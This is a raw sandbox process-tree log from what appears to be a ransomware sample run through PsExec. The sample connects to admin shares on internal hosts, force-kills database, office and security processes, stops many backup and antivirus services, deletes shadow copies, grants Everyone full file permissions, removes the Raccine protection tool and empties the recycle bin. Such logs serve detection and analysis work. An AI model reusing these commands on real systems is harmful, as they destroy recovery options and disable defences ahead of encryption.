C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\Users2⤵PID:2596
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\A$2⤵PID:1528
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\B$2⤵PID:1720
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵PID:4400
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
PID:4836
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
PID:3848
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\C$2⤵PID:4792
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
PID:2740
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\E$2⤵PID:4600
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
PID:1532
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵PID:5012
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\D$2⤵PID:3384
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\F$2⤵PID:4824
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\G$2⤵PID:4632
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵PID:4412
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵PID:4048
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
PID:4576
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\H$2⤵PID:3456
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:4268
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵PID:4868
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵PID:1676
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\I$2⤵PID:4996
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
PID:4528
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵PID:4828
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\J$2⤵PID:4968
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\K$2⤵PID:4320
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
PID:4148
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\L$2⤵PID:3032
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵PID:4884
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\M$2⤵PID:4168
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\N$2⤵PID:4460
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵PID:4424
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵PID:1512
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\O$2⤵PID:4428
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.11\P$2⤵PID:2976
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\Q$2⤵PID:740
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵PID:2684
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\R$2⤵PID:4704
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\A$2⤵PID:4780
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵PID:1532
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\B$2⤵PID:4396
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\S$2⤵PID:4796
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵PID:4812
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\T$2⤵PID:4256
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵PID:4996
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\U$2⤵PID:224
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\D$2⤵PID:4412
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵PID:4140
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\V$2⤵PID:4188
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\W$2⤵PID:2408
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵PID:3000
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.15\F$2⤵PID:3088
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\Users2⤵PID:5016
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵PID:4952
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\X$2⤵PID:4208
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\Y$2⤵PID:5028
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\H$2⤵PID:4048
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
PID:4732
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\B$2⤵PID:4648
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\Z$2⤵PID:4136
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
PID:1652
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\I$2⤵PID:4792
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\C$2⤵PID:3464
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\J$2⤵PID:3992
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\D$2⤵PID:4180
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵PID:1928
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\Users2⤵PID:4400
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\K$2⤵PID:2312
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\E$2⤵PID:5036
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\A$2⤵PID:4668
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\L$2⤵PID:4116
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵PID:3792
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4200
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\B$2⤵PID:3984
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\M$2⤵PID:4204
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4808
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\C$2⤵PID:4528
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\N$2⤵PID:5048
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\G$2⤵PID:4592
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.14\D$2⤵PID:2596
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub1⤵PID:3668
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost1⤵PID:3888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y1⤵PID:4804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y1⤵PID:4640
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y1⤵PID:2596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y2⤵PID:4112
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y1⤵PID:3364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y1⤵PID:4532
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y1⤵PID:4100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y1⤵PID:3480
-
C:\Windows\PSEXESVC.exeC:\Windows\PSEXESVC.exe1⤵PID:4720
-
C:\Windows\47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe"47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe"2⤵PID:3364
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe3⤵PID:4512
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F3⤵PID:4568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y4⤵PID:4428
-
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F3⤵
- Modifies registry key
PID:3684
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F3⤵PID:3928
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto3⤵PID:4048
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto3⤵PID:4544
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled3⤵PID:5024
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled3⤵PID:3456
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto3⤵PID:4828
-
-
C:\Windows\system32\net.exe"net.exe" stop bedbg /y3⤵PID:4228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y4⤵PID:4172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y5⤵PID:1180
-
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin3⤵PID:4432
-
-
C:\Windows\system32\net.exe"net.exe" start FDResPub /y3⤵PID:4912
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y4⤵PID:748
-
-
-
C:\Windows\system32\net.exe"net.exe" start Dnscache /y3⤵PID:1540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y4⤵PID:4788
-
-
-
C:\Windows\system32\net.exe"net.exe" start SSDPSRV /y3⤵PID:4272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y4⤵PID:4364
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MMS /y3⤵PID:5060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y4⤵PID:192
-
-
-
C:\Windows\system32\net.exe"net.exe" stop avpsus /y3⤵PID:4852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y4⤵PID:4192
-
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵PID:4492
-
-
C:\Windows\system32\net.exe"net.exe" start upnphost /y3⤵PID:1520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y4⤵PID:4744
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EhttpSrv /y3⤵PID:4252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y4⤵PID:4436
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y3⤵PID:4652
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeDLPAgentService /y3⤵PID:4696
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y4⤵PID:1632
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mozyprobackup /y3⤵PID:3168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y4⤵PID:3992
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfewc /y3⤵PID:4892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y4⤵PID:4748
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ekrn /y3⤵PID:3564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y4⤵PID:2584
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ccEvtMgr /y3⤵PID:1928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y4⤵PID:4208
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y5⤵PID:4932
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BMR Boot Service /y3⤵PID:660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y4⤵PID:4940
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y3⤵PID:4020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y4⤵PID:2272
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y3⤵PID:4332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y4⤵PID:1704
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ccSetMgr /y3⤵PID:3900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y4⤵PID:4144
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EPSecurityService /y3⤵PID:4720
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y4⤵PID:4280
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPS /y3⤵PID:4460
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:4528
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y4⤵PID:5032
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SavRoam /y3⤵PID:4376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y4⤵PID:4736
-
-
-
C:\Windows\system32\net.exe"net.exe" stop DefWatch /y3⤵PID:4756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y4⤵PID:4320
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EPUpdateService /y3⤵PID:4932
-
-
C:\Windows\system32\net.exe"net.exe" stop ntrtscan /y3⤵PID:956
-
-
C:\Windows\system32\net.exe"net.exe" stop EsgShKernel /y3⤵PID:2780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y4⤵PID:4496
-
-
-
C:\Windows\system32\net.exe"net.exe" stop RTVscan /y3⤵PID:4156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y4⤵PID:4632
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPSAMA /y3⤵PID:4644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y4⤵PID:1084
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBFCService /y3⤵PID:2784
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y3⤵PID:2312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y4⤵PID:4808
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵PID:3792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y4⤵PID:4204
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBIDPService /y3⤵PID:4308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y4⤵PID:4628
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y3⤵PID:4928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y4⤵PID:5060
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:4112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y4⤵PID:4148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y5⤵PID:4180
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y3⤵PID:4652
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y4⤵PID:224
-
-
-
C:\Windows\system32\net.exe"net.exe" stop KAVFS /y3⤵PID:4892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y4⤵PID:4260
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VSNAPVSS /y3⤵PID:4356
-
-
C:\Windows\system32\net.exe"net.exe" stop QBCFMonitorService /y3⤵PID:4840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y4⤵PID:360
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ESHASRV /y3⤵PID:4548
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y4⤵PID:4416
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y3⤵PID:1500
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y4⤵PID:4428
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLWriter /y3⤵PID:2268
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y4⤵PID:3268
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y3⤵PID:4748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y4⤵PID:4916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y5⤵PID:4920
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooBackup /y3⤵PID:1632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y4⤵PID:4940
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SDRSVC /y3⤵PID:2772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y4⤵PID:4480
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y3⤵PID:2408
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y4⤵PID:4280
-
-
-
C:\Windows\system32\net.exe"net.exe" stop veeam /y3⤵PID:4232
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y3⤵PID:2596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y4⤵PID:4904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y5⤵PID:1520
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooIT /y3⤵PID:5080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y4⤵PID:5104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y5⤵PID:4508
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y3⤵PID:652
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y4⤵PID:4368
-
-
-
C:\Windows\system32\net.exe"net.exe" stop KAVFSGT /y3⤵PID:4484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y4⤵PID:504
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y3⤵PID:4712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y4⤵PID:2664
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBackupSvc /y3⤵PID:1556
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y4⤵PID:1444
-
-
-
C:\Windows\system32\net.exe"net.exe" stop FA_Scheduler /y3⤵PID:4148
-
-
C:\Windows\system32\net.exe"net.exe" stop zhudongfangyu /y3⤵PID:4568
-
-
C:\Windows\system32\net.exe"net.exe" stop stc_raw_agent /y3⤵PID:3892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y4⤵PID:4200
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y3⤵PID:2688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y4⤵PID:4832
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:3984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y4⤵PID:1840
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y3⤵PID:4488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y4⤵PID:4948
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBrokerSvc /y3⤵PID:1084
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y4⤵PID:4748
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Enterprise Client Service” /y3⤵PID:4112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y4⤵PID:956
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y3⤵PID:4128
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQL Backups /y3⤵PID:4280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y4⤵PID:4252
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDiveciMediaService /y3⤵PID:4104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y4⤵PID:1660
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y3⤵PID:1652
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeEngineService /y3⤵PID:4428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y4⤵PID:2212
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y3⤵PID:4776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y4⤵PID:4176
-
-
-
C:\Windows\system32\net.exe"net.exe" stop klnagent /y3⤵PID:5028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y4⤵PID:4976
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer100 /y3⤵PID:3900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y4⤵PID:360
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetMsmqActivator /y3⤵PID:4200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y4⤵PID:4140
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCatalogSvc /y3⤵PID:3564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y4⤵PID:4376
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper100 /y3⤵PID:4732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y4⤵PID:4204
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y3⤵PID:4300
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y4⤵PID:4768
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeIS /y3⤵PID:4548
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y4⤵PID:3384
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFramework /y3⤵PID:4600
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y4⤵PID:1704
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵PID:4836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y4⤵PID:5064
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y3⤵PID:4136
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y3⤵PID:2172
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper /y3⤵PID:5068
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y3⤵PID:1544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y4⤵PID:1872
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y3⤵PID:2836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y4⤵PID:4284
-
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes3⤵PID:4540
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamMountSvc /y3⤵PID:3616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y4⤵PID:4256
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SamSs /y3⤵PID:4692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y4⤵PID:740
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y3⤵PID:4272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y4⤵PID:5060
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerOLAPService /y3⤵PID:1616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y4⤵PID:3268
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCloudSvc /y3⤵PID:4228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y4⤵PID:2420
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer /y3⤵PID:4188
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y3⤵PID:3428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y4⤵PID:3848
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMTA /y3⤵PID:5052
-
-
C:\Windows\system32\net.exe"net.exe" stop CASAD2DWebSvc /y3⤵PID:4632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y4⤵PID:504
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Backup Service” /y3⤵PID:2596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y4⤵PID:4656
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y3⤵PID:4660
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer110 /y3⤵PID:2740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y4⤵PID:4708
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y3⤵PID:5004
-
